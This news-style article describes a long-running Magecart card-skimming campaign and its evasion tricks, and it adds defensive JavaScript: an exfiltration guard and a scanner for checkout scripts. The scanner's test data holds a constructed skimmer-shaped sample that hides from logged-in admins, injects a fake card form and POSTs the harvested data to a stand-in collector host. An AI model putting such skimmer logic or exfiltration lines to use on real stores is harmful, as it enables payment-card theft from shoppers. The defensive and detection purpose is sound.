Tag: Credit Card Skimming

  • The Two-Year Heist: Stealthy Magecart Network Exposed Targeting 6 Payment Giants

    A web-skimming campaign that intercepted payment-card data on e-commerce checkout pages ran undetected for almost two years. Cards issued on the American Express, Mastercard, Discover, Diners Club, JCB and UnionPay networks were targeted. The scale of the operation only became clear when researchers at Silent Push investigated suspicious activity on domains hosted by a provider run by the Dutch company WorkTitans B.V.

    Throughout the campaign the attackers injected malicious JavaScript into the checkout pages of legitimate online stores. The code runs while the customer completes a purchase and captures what is typed into the form: card number, expiry date and CVC, along with the customer's name, shipping address and contact details. The stolen data was then sent to an attacker-controlled server in ordinary HTTP requests.
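    The exfiltration step described above is the one a store operator can instrument. As an added example (not code from the Silent Push report or from the skimmer), the guard below wraps a fetch-style sender so that any request whose body carries a Luhn-valid card number to a non-allow-listed origin is blocked and reported. The origins, the first-party URL and the sample requests are constructed for the demo.

```javascript
// Added example: runtime exfiltration guard for a checkout page.
// Not the campaign's code and not a vendor API; origins and samples are assumed.

const ALLOWED_ORIGINS = new Set([
  "https://shop.example",     // assumed first-party origin
  "https://api.stripe.com",   // assumed legitimate PSP endpoint
]);

// Luhn mod-10 check over a string of digits.
function luhnValid(digits) {
  let sum = 0, alt = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (alt) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    alt = !alt;
  }
  return digits.length > 0 && sum % 10 === 0;
}

// Return every PAN-like token (13-19 digits, spaces/dashes allowed) that passes Luhn.
function findPans(text) {
  const hits = [];
  for (const m of String(text).matchAll(/(?:\d[ -]?){13,19}/g)) {
    const digits = m[0].replace(/[ -]/g, "");
    if (digits.length >= 13 && digits.length <= 19 && luhnValid(digits)) hits.push(digits);
  }
  return hits;
}

// Flatten the common fetch body types to inspectable text.
function bodyToText(body) {
  if (body == null) return "";
  if (typeof body === "string") return body;
  if (typeof URLSearchParams !== "undefined" && body instanceof URLSearchParams) return body.toString();
  try { return JSON.stringify(body); } catch (e) { return String(body); }
}

// Wrap a fetch-like function. Requests carrying card data to an origin outside
// the allow-list are rejected and passed to `report`; everything else goes through.
function makeExfilGuard(sendFn, { allowedOrigins, firstParty, report = () => {} }) {
  const log = [];
  const guarded = function (input, init = {}) {
    const url = typeof input === "string" ? input : input.url;
    let origin;
    try { origin = new URL(url, firstParty).origin; } catch (e) { origin = "invalid"; }
    const pans = findPans(bodyToText(init.body));
    const entry = { url, origin, pansFound: pans.length, blocked: false };
    if (pans.length > 0 && !allowedOrigins.has(origin)) {
      entry.blocked = true;
      log.push(entry);
      report(entry); // e.g. forward to your own telemetry endpoint
      return Promise.reject(new Error("blocked card data exfiltration to " + origin));
    }
    log.push(entry);
    return sendFn(input, init);
  };
  return { guarded, log };
}

// Demo with a fake sender so the block runs offline (constructed traffic).
const sent = [];
const fakeFetch = (input, init) => { sent.push({ input, init }); return Promise.resolve({ ok: true }); };
const { guarded, log } = makeExfilGuard(fakeFetch, {
  allowedOrigins: ALLOWED_ORIGINS,
  firstParty: "https://shop.example",
});

// Skimmer-style POST of harvested fields to an unrelated host: blocked.
const skimmerBody = JSON.stringify({ cc: "4111 1111 1111 1111", exp: "12/27", cvc: "123", name: "A. Buyer" });
guarded("https://collector.invalid/r", { method: "POST", body: skimmerBody }).catch(() => {});
// Legitimate tokenisation call to the PSP: allowed.
guarded("https://api.stripe.com/v1/tokens", { method: "POST", body: "card[number]=4111111111111111" });
// Relative first-party call without card data: allowed.
guarded("/cart/update", { method: "POST", body: "qty=2" });
```

    In a browser you would install it as `window.fetch = makeExfilGuard(window.fetch, …).guarded` (and wrap `XMLHttpRequest.prototype.send` and `navigator.sendBeacon` the same way). Treat it as a tripwire rather than a boundary: a skimmer running in the same origin can restore the original functions, submit a plain HTML form, or encode the data before sending, so the browser-enforced control is a Content-Security-Policy `connect-src`/`form-action` list, with this guard providing the telemetry that CSP reports alone do not give you.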

    A hallmark of the operation was the domain cdn-cookie[.]com, which hosted encrypted scripts such as recorder.js and tab-gtm.js. Compromised storefronts loaded these files from it, so the malicious logic never had to live on the victim site's own server. One of the main anti-analysis measures was a check for the wpadminbar element, the toolbar WordPress shows to logged-in administrators. If that element was present, the script removed itself immediately, so a site owner viewing their own checkout page while logged in would never see the skimmer run.

    The script adapted to different payment setups. When it detected a Stripe integration it checked browser storage for a specific flag, wc_cart_hash, a name that WooCommerce itself uses for its cart-fragment cache, which helps the flag blend in. If the flag was absent, the victim was shown a counterfeit payment form styled to match the genuine one. After the victim submitted their details, the page displayed a fabricated card error and asked them to enter the data again, by which point the first submission had already been sent to the attackers. The flag was then set so that the same victim would not be shown the fake form a second time.
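    The admin-bar check, the wc_cart_hash gate, the injected form and the outbound send described in the two paragraphs above are all visible in a script's source, so they can be turned into a static triage pass over the scripts a checkout page loads. The scanner below is an added example (not the report's tooling and not the skimmer's code); the allow-list, the indicator weights, the threshold and the three sample scripts are constructed for the demo.

```javascript
// Added example: static triage of checkout-page scripts against the behaviours
// described in the report. Allow-list, weights, threshold and samples are assumed.

const ALLOWED_SCRIPT_HOSTS = new Set(["shop.example", "js.stripe.com"]); // assumed

// Indicator name, weight, and a predicate over the script body.
const INDICATORS = [
  ["wp_admin_bar_evasion", 2, b => /(getElementById|querySelector)\(\s*['"]#?wpadminbar['"]\s*\)/.test(b)],
  ["wc_cart_hash_gate",    2, b => /(localStorage|sessionStorage)[^\n]{0,40}wc_cart_hash/.test(b)],
  ["card_field_harvest",   1, b => (b.match(/card[ _-]?number|cc[ _-]?num|cvc|cvv|exp(iry|_month|_year|date)/gi) || []).length >= 2],
  ["form_injection",       1, b => /(innerHTML\s*=|insertAdjacentHTML\()/.test(b) && /<(form|input)\b/i.test(b)],
  ["network_send",         1, b => /\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b/.test(b) && /https?:\/\//.test(b)],
];
const FOREIGN_HOST_WEIGHT = 2; // script served from a host not on the allow-list
const FLAG_THRESHOLD = 4;      // assumed; tune against your own first-party scripts

// Hostname of an absolute src; null for relative (first-party) paths.
function hostOf(src) {
  try { return new URL(src).hostname; } catch (e) { return null; }
}

function triageScript({ src, body }, allowedHosts = ALLOWED_SCRIPT_HOSTS) {
  const host = hostOf(src);
  const hits = [];
  let score = 0;
  if (host !== null && !allowedHosts.has(host)) {
    hits.push("unlisted_script_host:" + host);
    score += FOREIGN_HOST_WEIGHT;
  }
  for (const [name, weight, test] of INDICATORS) {
    if (test(body)) { hits.push(name); score += weight; }
  }
  return { src, host, hits, score, flagged: score >= FLAG_THRESHOLD };
}

function triagePage(scripts, allowedHosts = ALLOWED_SCRIPT_HOSTS) {
  return scripts.map(s => triageScript(s, allowedHosts)).filter(r => r.flagged);
}

// Constructed samples: a first-party WooCommerce helper, a vendor bundle from an
// allow-listed host, and a skimmer-shaped script served from the domain named
// in the report. None of these bodies is real code.
const SAMPLE_PAGE_SCRIPTS = [
  { src: "/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js",
    body: "var h = sessionStorage.getItem('wc_cart_hash'); jQuery.post(wc_cart_fragments_params.wc_ajax_url, {}, refresh);" },
  { src: "https://js.stripe.com/v3/",
    body: "/* vendor bundle: card_number, cvc, exp_month handling */ fetch('https://api.stripe.com/v1/tokens');" },
  { src: "https://cdn-cookie.com/tab-gtm.js",
    body: [
      "if (document.getElementById('wpadminbar')) { return; }",
      "if (!localStorage.getItem('wc_cart_hash')) {",
      "  box.innerHTML = '<form><input name=\"cardnumber\"><input name=\"exp\"><input name=\"cvc\"></form>';",
      "  fetch('https://collector.invalid/r', { method: 'POST', body: payload });",
      "  localStorage.setItem('wc_cart_hash', '1');",
      "}",
    ].join("\n") },
];

const FLAGGED = triagePage(SAMPLE_PAGE_SCRIPTS);
```

    Two caveats apply when running this against a real store. The scripts in this campaign were served encrypted, so the regexes have to run on the decoded body (or on what the browser actually executes, captured via a debugger or proxy), not on the bytes on the wire. And first-party WooCommerce and payment-plugin scripts legitimately touch wc_cart_hash, card fields and network calls, which is why those indicators are weighted low and why a hash-based allow-list of your own known-good scripts should replace the host allow-list once the inventory is stable.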

    The scheme shows a high level of craftsmanship. Its authors understood WordPress, and the WooCommerce store plugin running on it, well enough to weave little-known platform details into the attack. The hosting infrastructure behind the malicious components, previously associated with Stark Industries and PQ.Hosting, was rebranded as THE[.]Hosting, most likely to sidestep pressure from sanctions.

    The campaign is attributed to the Magecart family of web-skimming groups, which originally exploited vulnerabilities in Magento but has since spread to a wide range of platforms. An operation of this scope against customers of the world's major card networks shows how complex and persistent online skimming has become.